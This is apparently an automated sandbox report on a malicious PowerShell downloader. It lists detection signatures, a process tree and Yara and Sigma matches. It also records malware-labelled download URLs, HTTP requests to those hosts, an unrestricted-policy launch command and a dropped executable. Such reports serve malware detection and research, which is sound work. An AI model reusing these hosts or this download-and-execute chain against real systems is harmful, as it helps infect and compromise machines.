Windows Analysis Report
ps1006.ps1

Overview

General Information

Sample name: ps1006.ps1
Analysis ID: 1560748
MD5: c538cd6483e9cf1510943d965f890777
SHA1: 4dd880286916a54f6b0b3ed74e85135d1b2fc032
SHA256: 8d09f0aa9a5d675e1f28dd31f6c982d33924c58d7b9b873d5cc90f3ddea5b491
Tags: malware, ps1, user-Joker

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4416 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 6240 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings):
  • Process Memory Space: powershell.exe PID: 7096 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: powershell.exe PID: 7096 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    Matched strings:
    • 0xae94:$b2: ::FromBase64String(
    • 0xaf14:$b2: ::FromBase64String(
    • 0xb485:$b2: ::FromBase64String(
    • 0xcc8b18:$b2: ::FromBase64String(
    • 0xcc8b98:$b2: ::FromBase64String(
    • 0xcc9109:$b2: ::FromBase64String(
    • 0xd8c456:$b2: ::FromBase64String(
    • 0xd8c4d6:$b2: ::FromBase64String(
    • 0xd8ca47:$b2: ::FromBase64String(
    • 0xb3bd:$s1: -join
    • 0xd9a07:$s1: -join
    • 0xe6adc:$s1: -join
    • 0xe9eae:$s1: -join
    • 0xea560:$s1: -join
    • 0xec051:$s1: -join
    • 0xee257:$s1: -join
    • 0xeea7e:$s1: -join
    • 0xef2ee:$s1: -join
    • 0xefa29:$s1: -join
    • 0xefa5b:$s1: -join
    • 0xefaa3:$s1: -join

    System Summary

    Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\Public\509.exe
    Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ProcessId: 7096, ProcessName: powershell.exe
    Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", ProcessId: 4416, ProcessName: csc.exe
    Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\Public\509.exe
    Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ProcessId: 7096, ProcessName: powershell.exe

    Data Obfuscation

    Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", ProcessId: 4416, ProcessName: csc.exe
    No Suricata rule has matched

    AV Detection

    Source: ps1006.ps1; Avira: detected
    Source: http://fenett2018.com; Avira URL Cloud: Label: malware
    Source: http://eastend.jp; Avira URL Cloud: Label: malware
    Source: http://eastend.jp/bl5kfa; Avira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info; Avira URL Cloud: Label: malware
    Source: http://bemnyc.com/u8erijeq; Avira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23; Avira URL Cloud: Label: malware
    Source: http://fenett2018.com/dobgx; Avira URL Cloud: Label: malware
    Source: http://abakus-biuro.net//a9zqemm; Avira URL Cloud: Label: malware
    Source: ps1006.ps1; ReversingLabs: Detection: 63%
    Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
    Source: Binary string: @/"z.pdb source: powershell.exe, 00000000.00000002.2809800197.000001B2B46D0000.00000004.00000020.00020000.00000000.sdmp
    Source: global traffic; HTTP traffic detected: GET /bl5kfa HTTP/1.1 Host: eastend.jp Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected: GET /u8erijeq HTTP/1.1 Host: bemnyc.com Connection: Keep-Alive
    Source: Joe Sandbox View; IP Address: 198.185.159.145 198.185.159.145
    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic; DNS traffic detected: DNS query: habarimoto24.com
    Source: global traffic; DNS traffic detected: DNS query: fenett2018.com
    Source: global traffic; DNS traffic detected: DNS query: eastend.jp
    Source: global traffic; DNS traffic detected: DNS query: bemnyc.com
    Source: global traffic; DNS traffic detected: DNS query: abakus-biuro.net
    Source: global traffic; DNS traffic detected: DNS query: yourmother4cancer.info
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Nov 2024 08:22:05 GMT Content-Type: text/html Content-Length: 2814 Connection: keep-alive Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT ETag: "afe-6014d2fcf5ab8"
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://abakus-biuro.net
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1; String found in binary or memory: http://abakus-biuro.net//a9zqemm
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://bemnyc.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1; String found in binary or memory: http://bemnyc.com/u8erijeq
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://eastend.jp
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1; String found in binary or memory: http://eastend.jp/bl5kfa
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5CD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://fenett2018.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1; String found in binary or memory: http://fenett2018.com/dobgx
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://go.micros
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://habarimoto24.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1; String found in binary or memory: http://habarimoto24.com/nh
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.cy
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://yourmother4cancer.info
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000000.00000002.2805114270.000001B2B4410000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-202
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29D8EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29D8C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29DC69000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://status.squarespace.com

    System Summary

    Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9B875F78 0_2_00007FFD9B875F78
    Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engine; Classification label: mal96.expl.evad.winPS1@7/14@6/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\509.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2swlg4m.ubm.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntmarta.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: version.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: mscoree.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe; Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe; Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: @/"z.pdb source: powershell.exe, 00000000.00000002.2809800197.000001B2B46D0000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B87B6FB push esp; retf 0_2_00007FFD9B87B6FC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B877967 push ebx; retf 0_2_00007FFD9B87796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B877513 push ebx; iretd 0_2_00007FFD9B87756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B870952 push E95B7ED0h; ret 0_2_00007FFD9B8709C9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B94240C push 8B485F95h; iretd 0_2_00007FFD9B942411
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (3 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (2 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (136 identical entries)
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (14 identical entries)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
